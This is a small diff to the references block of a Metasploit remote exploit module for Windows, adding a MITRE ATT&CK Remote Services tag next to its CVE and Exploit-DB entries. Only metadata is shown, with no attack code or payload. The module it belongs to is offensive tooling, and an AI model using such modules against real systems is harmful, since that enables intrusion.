@@ -30,7 +30,8 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'References' => [
           ['CVE', '2025-34079'],
-          ['EDB', '48360']
+          ['EDB', '48360'],
+          ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
         ],
         'Platform' => %w[windows],
         'Arch' => [ARCH_X64],
